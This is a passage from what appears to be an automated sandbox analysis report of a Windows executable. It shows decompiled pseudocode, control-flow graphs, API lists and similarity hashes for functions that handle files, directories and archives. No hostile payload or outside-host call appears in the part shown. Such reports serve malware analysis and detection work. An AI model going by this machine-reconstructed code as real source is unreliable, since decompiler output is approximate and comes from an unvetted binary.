                                                                                                                            0x00402709
                                                                                                                            0x0040270e
                                                                                                                            0x0040270e
                                                                                                                            0x004028ae
                                                                                                                            0x004028ba
                                                                                                                            0x004028c2

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 004026C6
                                                                                                                              • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID: Default
                                                                                                                            • API String ID: 3519838083-753088835
                                                                                                                            • Opcode ID: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                                                                                                            • Instruction ID: a54c0451a2b32841cee07a3996f3f819ed4c8f4dfc8041cf4803658e5a70c8e5
                                                                                                                            • Opcode Fuzzy Hash: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                                                                                                            • Instruction Fuzzy Hash: 84515171800109ABDB11EFA5C981EDDFBB9BF14308F1085AEE515B32D2DB786A09CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040FE8A Relevance: 3.2, APIs: 2, Instructions: 199COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1340 40fe8a-40ff0f call 418d80 call 40e063 call 40e83c * 2 call 40fc2a call 40bc60 1353 40ff15 1340->1353 1354 41003d-410045 1340->1354 1355 40ff1a-40ff40 call 410d82 1353->1355 1356 410047-410057 1354->1356 1357 41005a-410064 call 40dc5d 1354->1357 1362 40ff46-40ff48 1355->1362 1363 4100a6-4100b5 _CxxThrowException 1355->1363 1356->1357 1361 410069-410093 call 403204 * 3 call 40df15 1357->1361 1391 410095-4100a3 1361->1391 1362->1363 1366 40ff4e-40ff5e call 407ab8 call 4031dd 1362->1366 1365 4100ba-4100c0 1363->1365 1368 4100c2-4100c4 1365->1368 1369 4100c8-410104 call 40dc5d call 403204 * 3 call 40df15 1365->1369 1382 40ff60-40ff6b 1366->1382 1383 40ff6d 1366->1383 1368->1369 1369->1391 1386 40ff6f-40ff74 1382->1386 1383->1386 1389 40ff76-40ff78 1386->1389 1390 40ff7c-40ffc4 call 40bd85 1386->1390 1389->1390 1394 40ffc9-40ffce 1390->1394 1394->1365 1396 40ffd4-40ffd7 1394->1396 1398 40ffe0-40ffe9 1396->1398 1399 40ffd9-40ffdc 1396->1399 1401 41001a-410020 1398->1401 1402 40ffeb-40fff4 1398->1402 1399->1398 1404 410022-410024 1401->1404 1405 410028-410034 1401->1405 1402->1401 1403 40fff6-410013 call 418c10 1402->1403 1403->1401 1410 410015 call 40e966 1403->1410 1404->1405 1406 40ff17 1405->1406 1407 41003a 1405->1407 1406->1355 1407->1354 1410->1401
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E0040FE8A(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr* _t139;
				intOrPtr _t144;
				signed int _t145;
				void* _t150;
				signed int _t185;
				void* _t190;
				signed int _t191;
				intOrPtr _t193;
				intOrPtr* _t195;
				void* _t197;
				void* _t204;

				_t204 = __eflags;
				E00418D80(E0041A566, _t197);
				_t195 = __ecx;
				_push(_t190);
				 *((intOrPtr*)(_t197 - 0x1c)) = __ecx;
				E0040E063(_t197 - 0xa0);
				 *(_t197 - 4) = 0;
				 *((intOrPtr*)(_t197 - 0x2c)) = 0;
				 *((intOrPtr*)(_t197 - 0x28)) = 0;
				 *((intOrPtr*)(_t197 - 0x24)) = 0;
				 *(_t197 - 4) = 1;
				E0040E83C(_t197 - 0x44);
				 *(_t197 - 4) = 2;
				E0040E83C(_t197 - 0x38);
				 *(_t197 - 4) = 3;
				E0040FC2A(0, __ecx, __edx, _t190, __ecx, _t204, 0,  *((intOrPtr*)(_t197 + 0x10)), _t197 - 0xa0, _t197 - 0x2c, _t197 - 0x44);
				E0040BC60(_t197 - 0x100, _t204,  *((intOrPtr*)(_t195 + 0x78)));
				_t191 = 0;
				 *(_t197 - 4) = 4;
				 *(_t197 - 0x14) = 0;
				if( *((intOrPtr*)(_t197 - 0x9c)) <= 0) {
					L21:
					_t116 =  *((intOrPtr*)(_t197 - 0x98));
					if(_t116 != 0) {
						 *((intOrPtr*)(_t195 + 0x70)) =  *((intOrPtr*)(_t195 + 0x70)) +  *((intOrPtr*)(_t116 +  *(_t197 - 0xa0) * 8));
						asm("adc [esi+0x74], eax");
					}
					 *(_t197 - 4) = 3;
					_t117 = E0040DC5D(_t197 - 0x100); // executed
					E00403204(E00403204(E00403204(_t117,  *((intOrPtr*)(_t197 - 0x38))),  *((intOrPtr*)(_t197 - 0x44))),  *((intOrPtr*)(_t197 - 0x2c)));
					 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
					E0040DF15(_t197 - 0xa0);
					_t122 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
					return _t122;
				}
				while(1) {
					_t124 = E00410D82( *((intOrPtr*)(_t197 + 0x14)));
					_t169 = _t124;
					 *((intOrPtr*)(_t197 - 0x18)) = _t124;
					_t185 = ( *( *((intOrPtr*)(_t197 - 0x6c)) + _t191) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x74)) + _t191 * 4));
					_t127 =  *((intOrPtr*)(_t197 - 0x78));
					_t193 =  *((intOrPtr*)(_t127 + _t185 * 8));
					_t128 =  *((intOrPtr*)(_t127 + 4 + _t185 * 8));
					if(_t193 != _t193 || 0 != _t128) {
						break;
					}
					E00407AB8(_t169, _t193);
					_push(0x14);
					_t139 = E004031DD();
					if(_t139 == 0) {
						_t195 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t139 + 4)) = 0;
						 *_t139 = 0x41bd38;
						_t195 = _t139;
					}
					_t209 = _t195;
					 *((intOrPtr*)(_t197 - 0x48)) = _t195;
					if(_t195 != 0) {
						 *((intOrPtr*)( *_t195 + 4))(_t195);
					}
					 *((intOrPtr*)(_t195 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18))));
					 *((intOrPtr*)(_t195 + 0x10)) = 0;
					 *((intOrPtr*)(_t195 + 0xc)) = _t193;
					 *(_t197 - 4) = 5;
					 *((char*)(_t197 - 0xd)) = 0;
					asm("adc ecx, [ebp+0xc]");
					_t144 = E0040BD85(_t197 - 0x100, _t209,  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x1c)))),  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) +  *((intOrPtr*)(_t197 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)) + 4)), _t197 - 0xa0,  *(_t197 - 0x14), 0, _t195, 0, 0, _t197 - 0xd, 0, 1, 0, 0); // executed
					 *((intOrPtr*)(_t197 - 0x20)) = _t144;
					if(_t144 != 0) {
						L26:
						__eflags = _t195;
						 *(_t197 - 4) = 4;
						if(_t195 != 0) {
							 *((intOrPtr*)( *_t195 + 8))(_t195);
						}
						 *(_t197 - 4) = 3;
						E00403204(E00403204(E00403204(E0040DC5D(_t197 - 0x100),  *((intOrPtr*)(_t197 - 0x38))),  *((intOrPtr*)(_t197 - 0x44))),  *((intOrPtr*)(_t197 - 0x2c)));
						 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
						E0040DF15(_t197 - 0xa0);
						_t122 =  *((intOrPtr*)(_t197 - 0x20));
						goto L24;
					} else {
						if( *((intOrPtr*)(_t197 - 0xd)) != 0) {
							 *((char*)( *((intOrPtr*)(_t197 - 0x1c)) + 0x3c)) = 1;
						}
						_t145 =  *(_t197 - 0x14);
						if(_t145 <  *((intOrPtr*)(_t197 - 0x90)) &&  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x94)) + _t145)) != 0) {
							 *((intOrPtr*)(_t197 - 0x18)) =  *((intOrPtr*)(_t197 - 0x88)) + _t145 * 4;
							_t150 = E00418C10( *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18)))), _t193);
							_t181 =  *((intOrPtr*)(_t197 - 0x18));
							if(_t150 !=  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18))))) {
								E0040E966(_t181);
							}
						}
						 *(_t197 - 4) = 4;
						if(_t195 != 0) {
							 *((intOrPtr*)( *_t195 + 8))(_t195);
						}
						 *(_t197 - 0x14) =  *(_t197 - 0x14) + 1;
						if( *(_t197 - 0x14) <  *((intOrPtr*)(_t197 - 0x9c))) {
							_t191 =  *(_t197 - 0x14);
							continue;
						} else {
							_t195 =  *((intOrPtr*)(_t197 - 0x1c));
							goto L21;
						}
					}
				}
				_push(0x41de18);
				_push(_t197 + 0x13);
				L00418E02();
				goto L26;
			}























                                                                                                                            0x0040fe8a
                                                                                                                            0x0040fe8f
                                                                                                                            0x0040fe9c
                                                                                                                            0x0040fe9e
                                                                                                                            0x0040fea5
                                                                                                                            0x0040fea8
                                                                                                                            0x0040feaf
                                                                                                                            0x0040feb2
                                                                                                                            0x0040feb5
                                                                                                                            0x0040feb8
                                                                                                                            0x0040febe
                                                                                                                            0x0040fec2
                                                                                                                            0x0040feca
                                                                                                                            0x0040fece
                                                                                                                            0x0040fee4
                                                                                                                            0x0040feec
                                                                                                                            0x0040fefb
                                                                                                                            0x0040ff00
                                                                                                                            0x0040ff08
                                                                                                                            0x0040ff0c
                                                                                                                            0x0040ff0f
                                                                                                                            0x0041003d
                                                                                                                            0x0041003d
                                                                                                                            0x00410045
                                                                                                                            0x00410054
                                                                                                                            0x00410057
                                                                                                                            0x00410057
                                                                                                                            0x00410060
                                                                                                                            0x00410064
                                                                                                                            0x0041007c
                                                                                                                            0x00410081
                                                                                                                            0x0041008e
                                                                                                                            0x00410093
                                                                                                                            0x00410095
                                                                                                                            0x0041009b
                                                                                                                            0x004100a3
                                                                                                                            0x004100a3
                                                                                                                            0x0040ff1a
                                                                                                                            0x0040ff1d
                                                                                                                            0x0040ff22
                                                                                                                            0x0040ff27
                                                                                                                            0x0040ff31
                                                                                                                            0x0040ff34
                                                                                                                            0x0040ff37
                                                                                                                            0x0040ff3c
                                                                                                                            0x0040ff40
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ff4f
                                                                                                                            0x0040ff54
                                                                                                                            0x0040ff56
                                                                                                                            0x0040ff5e
                                                                                                                            0x0040ff6d
                                                                                                                            0x0040ff6d
                                                                                                                            0x0040ff60
                                                                                                                            0x0040ff60
                                                                                                                            0x0040ff63
                                                                                                                            0x0040ff69
                                                                                                                            0x0040ff69
                                                                                                                            0x0040ff6f
                                                                                                                            0x0040ff71
                                                                                                                            0x0040ff74
                                                                                                                            0x0040ff79
                                                                                                                            0x0040ff79
                                                                                                                            0x0040ff97
                                                                                                                            0x0040ffa1
                                                                                                                            0x0040ffa4
                                                                                                                            0x0040ffb1
                                                                                                                            0x0040ffb5
                                                                                                                            0x0040ffb8
                                                                                                                            0x0040ffc4
                                                                                                                            0x0040ffcb
                                                                                                                            0x0040ffce
                                                                                                                            0x004100ba
                                                                                                                            0x004100ba
                                                                                                                            0x004100bc
                                                                                                                            0x004100c0
                                                                                                                            0x004100c5
                                                                                                                            0x004100c5
                                                                                                                            0x004100ce
                                                                                                                            0x004100ea
                                                                                                                            0x004100ef
                                                                                                                            0x004100fc
                                                                                                                            0x00410101
                                                                                                                            0x00000000
                                                                                                                            0x0040ffd4
                                                                                                                            0x0040ffd7
                                                                                                                            0x0040ffdc
                                                                                                                            0x0040ffdc
                                                                                                                            0x0040ffe0
                                                                                                                            0x0040ffe9
                                                                                                                            0x00410006
                                                                                                                            0x00410009
                                                                                                                            0x0041000e
                                                                                                                            0x00410013
                                                                                                                            0x00410015
                                                                                                                            0x00410015
                                                                                                                            0x00410013
                                                                                                                            0x0041001c
                                                                                                                            0x00410020
                                                                                                                            0x00410025
                                                                                                                            0x00410025
                                                                                                                            0x00410028
                                                                                                                            0x00410034
                                                                                                                            0x0040ff17
                                                                                                                            0x00000000
                                                                                                                            0x0041003a
                                                                                                                            0x0041003a
                                                                                                                            0x00000000
                                                                                                                            0x0041003a
                                                                                                                            0x00410034
                                                                                                                            0x0040ffce
                                                                                                                            0x004100a9
                                                                                                                            0x004100b4
                                                                                                                            0x004100b5
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040FE8F
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 004100B5
                                                                                                                              • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                                                                                                              • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$H_prologmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3044594480-0
                                                                                                                            • Opcode ID: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                                                                                                            • Instruction ID: 88fd23d13b2165b9f29fbfc804bd3c55ab1378a3526c832d929a2e01daa6a8e0
                                                                                                                            • Opcode Fuzzy Hash: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                                                                                                            • Instruction Fuzzy Hash: 5B814E71D002499FCB21DFA9C881AEEBBB4AF09304F1480AEE555B7292C7785E85CF65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404678 Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1412 404678-4046b9 call 418d80 call 404d7d call 40368d call 404daf 1421 4046c9-4046d1 1412->1421 1422 4046bb 1412->1422 1423 4046e0-4046e8 1421->1423 1424 4046d3-4046de SetLastError 1421->1424 1425 4046be-4046c4 call 403204 1422->1425 1426 4046ea 1423->1426 1427 4046ee-4046ff call 403204 1423->1427 1424->1422 1431 4047f2-4047f4 1425->1431 1426->1427 1434 4047e5-4047f0 call 404462 1427->1434 1435 404705-40474e call 403740 call 401ef8 call 40368d call 4051f7 call 404d7d call 40368d 1427->1435 1433 4047fd-40480b 1431->1433 1434->1431 1440 4047f6-4047f8 call 404470 1434->1440 1452 404752-404759 call 405233 1435->1452 1440->1433 1454 40475e-404760 1452->1454 1455 4047c2-4047e4 call 403204 * 2 call 404b27 call 403204 1454->1455 1456 404762-404765 1454->1456 1455->1434 1457 404772-404786 call 40399c 1456->1457 1458 404767-40476d 1456->1458 1464 404796-40479e call 404643 1457->1464 1465 404788-40478b call 404678 1457->1465 1458->1457 1472 404790-404792 1464->1472 1465->1472 1473 4047a0-4047bd call 403204 * 2 call 404b27 1472->1473 1474 404794 1472->1474 1473->1425 1474->1452
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E00404678(intOrPtr* __ecx, void* __eflags) {
				void* _t63;
				signed char _t65;
				signed char _t67;
				signed int _t69;
				void* _t70;
				signed int _t79;
				signed int _t88;
				intOrPtr _t92;
				signed char _t94;
				intOrPtr* _t124;
				signed int _t128;
				void* _t129;
				void* _t134;

				_t134 = __eflags;
				E00418D80(E0041992B, _t129);
				_t124 = __ecx;
				_t94 = 1;
				 *(_t129 - 0xd) = _t94;
				E00404D7D(_t129 - 0x9c);
				E0040368D(_t129 - 0x74);
				 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
				_t63 = E00404DAF(_t129 - 0x9c, _t134,  *__ecx); // executed
				if(_t63 != 0) {
					_t65 =  *(_t129 - 0x7c) >> 4;
					__eflags = _t94 & _t65;
					if((_t94 & _t65) != 0) {
						_t67 =  *(_t129 - 0x7c) >> 0xa;
						__eflags = _t94 & _t67;
						if((_t94 & _t67) != 0) {
							_t14 = _t129 - 0xd;
							 *_t14 =  *(_t129 - 0xd) & 0x00000000;
							__eflags =  *_t14;
						}
						 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
						E00403204(_t67,  *((intOrPtr*)(_t129 - 0x74)));
						__eflags =  *(_t129 - 0xd);
						if(__eflags == 0) {
							L19:
							_t69 = E00404462( *_t124, 0);
							__eflags = _t69;
							if(_t69 != 0) {
								_t70 = E00404470( *_t124);
							} else {
								goto L20;
							}
						} else {
							E00403740(_t129 - 0x1c, __eflags, _t124);
							 *(_t129 - 4) = _t94;
							E00401EF8(_t129 - 0x1c, 0x5c);
							_t128 =  *(_t129 - 0x18);
							_t24 = _t129 - 0x2c;
							 *_t24 =  *(_t129 - 0x2c) | 0xffffffff;
							__eflags =  *_t24;
							 *(_t129 - 4) = 2;
							E0040368D(_t129 - 0x28);
							 *(_t129 - 4) = 3;
							E004051F7(_t129 - 0x2c, _t129 - 0x1c);
							E00404D7D(_t129 - 0x64);
							E0040368D(_t129 - 0x3c);
							 *(_t129 - 4) = 4;
							while(1) {
								_t79 = E00405233(_t129 - 0x2c, _t129 - 0x64);
								__eflags = _t79;
								if(_t79 == 0) {
									break;
								}
								__eflags = _t128 -  *(_t129 - 0x18);
								if(__eflags < 0) {
									_t92 =  *((intOrPtr*)(_t129 - 0x1c));
									 *(_t129 - 0x18) = _t128;
									_t39 = _t92 + _t128 * 2;
									 *_t39 =  *(_t92 + _t128 * 2) & 0x00000000;
									__eflags =  *_t39;
								}
								E0040399C(_t129 - 0x1c, __eflags, _t129 - 0x3c);
								__eflags = _t94 &  *(_t129 - 0x44) >> 0x00000004;
								if(__eflags == 0) {
									_t88 = E00404643( *((intOrPtr*)(_t129 - 0x1c)), __eflags);
								} else {
									_t88 = E00404678(_t129 - 0x1c, __eflags);
								}
								__eflags = _t88;
								if(_t88 == 0) {
									E00403204(E00403204(_t88,  *((intOrPtr*)(_t129 - 0x3c))),  *((intOrPtr*)(_t129 - 0x28)));
									_t65 = E00404B27(_t129 - 0x2c);
									_push( *((intOrPtr*)(_t129 - 0x1c)));
									goto L2;
								} else {
									continue;
								}
								goto L22;
							}
							E00403204(E00403204(_t79,  *((intOrPtr*)(_t129 - 0x3c))),  *((intOrPtr*)(_t129 - 0x28)));
							E00403204(E00404B27(_t129 - 0x2c),  *((intOrPtr*)(_t129 - 0x1c)));
							goto L19;
						}
					} else {
						SetLastError(0x10b);
						goto L1;
					}
				} else {
					L1:
					_push( *((intOrPtr*)(_t129 - 0x74)));
					L2:
					E00403204(_t65);
					L20:
					_t70 = 0;
				}
				L22:
				 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
				return _t70;
			}
















                                                                                                                            0x00404678
                                                                                                                            0x0040467d
                                                                                                                            0x0040468d
                                                                                                                            0x0040468f
                                                                                                                            0x00404696
                                                                                                                            0x00404699
                                                                                                                            0x004046a1
                                                                                                                            0x004046a8
                                                                                                                            0x004046b2
                                                                                                                            0x004046b9
                                                                                                                            0x004046cc
                                                                                                                            0x004046cf
                                                                                                                            0x004046d1
                                                                                                                            0x004046e3
                                                                                                                            0x004046e6
                                                                                                                            0x004046e8
                                                                                                                            0x004046ea
                                                                                                                            0x004046ea
                                                                                                                            0x004046ea
                                                                                                                            0x004046ea
                                                                                                                            0x004046f1
                                                                                                                            0x004046f5
                                                                                                                            0x004046fa
                                                                                                                            0x004046ff
                                                                                                                            0x004047e5
                                                                                                                            0x004047e9
                                                                                                                            0x004047ee
                                                                                                                            0x004047f0
                                                                                                                            0x004047f8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404705
                                                                                                                            0x00404709
                                                                                                                            0x00404713
                                                                                                                            0x00404716
                                                                                                                            0x0040471b
                                                                                                                            0x0040471e
                                                                                                                            0x0040471e
                                                                                                                            0x0040471e
                                                                                                                            0x00404725
                                                                                                                            0x00404729
                                                                                                                            0x00404735
                                                                                                                            0x00404739
                                                                                                                            0x00404741
                                                                                                                            0x00404749
                                                                                                                            0x0040474e
                                                                                                                            0x00404752
                                                                                                                            0x00404759
                                                                                                                            0x0040475e
                                                                                                                            0x00404760
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404762
                                                                                                                            0x00404765
                                                                                                                            0x00404767
                                                                                                                            0x0040476a
                                                                                                                            0x0040476d
                                                                                                                            0x0040476d
                                                                                                                            0x0040476d
                                                                                                                            0x0040476d
                                                                                                                            0x00404779
                                                                                                                            0x00404784
                                                                                                                            0x00404786
                                                                                                                            0x00404799
                                                                                                                            0x00404788
                                                                                                                            0x0040478b
                                                                                                                            0x0040478b
                                                                                                                            0x00404790
                                                                                                                            0x00404792
                                                                                                                            0x004047ab
                                                                                                                            0x004047b5
                                                                                                                            0x004047ba
                                                                                                                            0x00000000
                                                                                                                            0x00404794
                                                                                                                            0x00000000
                                                                                                                            0x00404794
                                                                                                                            0x00000000
                                                                                                                            0x00404792
                                                                                                                            0x004047cd
                                                                                                                            0x004047df
                                                                                                                            0x00000000
                                                                                                                            0x004047e4
                                                                                                                            0x004046d3
                                                                                                                            0x004046d8
                                                                                                                            0x00000000
                                                                                                                            0x004046d8
                                                                                                                            0x004046bb
                                                                                                                            0x004046bb
                                                                                                                            0x004046bb
                                                                                                                            0x004046be
                                                                                                                            0x004046be
                                                                                                                            0x004047f2
                                                                                                                            0x004047f2
                                                                                                                            0x004047f2
                                                                                                                            0x004047fd
                                                                                                                            0x00404803
                                                                                                                            0x0040480b

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040467D
                                                                                                                              • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                                                                                                            • SetLastError.KERNEL32(0000010B,?,75C182C0,?,00000000), ref: 004046D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901101390-0
                                                                                                                            • Opcode ID: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                                                                                                            • Instruction ID: 7e41f2cfff906f94df3d93499aef528f4dd0a588830c47bb788408f42dae3ac8
                                                                                                                            • Opcode Fuzzy Hash: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                                                                                                            • Instruction Fuzzy Hash: 8D416C71C002089ADF14EBA6D442AEDBB74AF45318F2080BEE661731D2DB3D6A09DB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B290 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0040B290(void* __ecx, void* __eflags) {
				intOrPtr* _t23;
				signed char _t24;
				void* _t26;
				void* _t46;
				void* _t48;
				void* _t53;

				_t53 = __eflags;
				E00418D80(E00419F70, _t48);
				_t46 = __ecx;
				E004037D2(__ecx + 0x10,  *((intOrPtr*)(_t48 + 8)));
				_t23 = E00403632(_t48 - 0x18, __ecx + 0x10,  *((intOrPtr*)(_t48 + 0xc)));
				 *(_t48 - 4) = 0;
				_t24 = E00404DAF(__ecx + 0x20, _t53,  *_t23); // executed
				asm("sbb bl, bl");
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				E00403204(_t24,  *((intOrPtr*)(_t48 - 0x18)));
				if( ~_t24 + 1 != 0) {
					_push(0x41c760);
					_push(_t48 + 8);
					 *((intOrPtr*)(_t48 + 8)) = 0x133061e;
					L00418E02();
				}
				_t26 = E004030D0(_t46 + 0x68);
				 *((intOrPtr*)(_t46 + 0x78)) = 0;
				 *((intOrPtr*)(_t46 + 0x84)) = 0;
				 *(_t46 + 0x58) =  *(_t46 + 0x58) & 0x00000000;
				 *(_t46 + 0x8c) =  *(_t46 + 0x8c) & 0x00000000;
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t26;
			}









                                                                                                                            0x0040b290
                                                                                                                            0x0040b295
                                                                                                                            0x0040b29f
                                                                                                                            0x0040b2aa
                                                                                                                            0x0040b2b7
                                                                                                                            0x0040b2c3
                                                                                                                            0x0040b2c6
                                                                                                                            0x0040b2d2
                                                                                                                            0x0040b2d4
                                                                                                                            0x0040b2da
                                                                                                                            0x0040b2e2
                                                                                                                            0x0040b2e7
                                                                                                                            0x0040b2ec
                                                                                                                            0x0040b2ed
                                                                                                                            0x0040b2f4
                                                                                                                            0x0040b2f4
                                                                                                                            0x0040b2fc
                                                                                                                            0x0040b304
                                                                                                                            0x0040b307
                                                                                                                            0x0040b30d
                                                                                                                            0x0040b311
                                                                                                                            0x0040b31b
                                                                                                                            0x0040b323

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040B295
                                                                                                                              • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041C760), ref: 0040B2F4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ExceptionThrowfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1371406966-0
                                                                                                                            • Opcode ID: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                                                                                                            • Instruction ID: 3991b56aa772d61d3444a8cef0fd9670766af5abd261621a3301c4c09fd1f304
                                                                                                                            • Opcode Fuzzy Hash: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                                                                                                            • Instruction Fuzzy Hash: 11012175640204AAC725EF22C451BDEBFF4EF80314F00852FE892A32E1CB786A49CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405303 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1498 405303-40532a SetFilePointer 1499 40533a-405358 call 4190a0 1498->1499 1500 40532c-405334 GetLastError 1498->1500 1503 40535a-40535c 1499->1503 1500->1499 1501 405336-405338 1500->1501 1501->1503
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E00405303(void** __ecx, long _a4, signed int _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				signed int _t9;
				long _t11;
				void* _t12;
				intOrPtr* _t14;
				void* _t15;
				signed int _t21;
				long _t23;

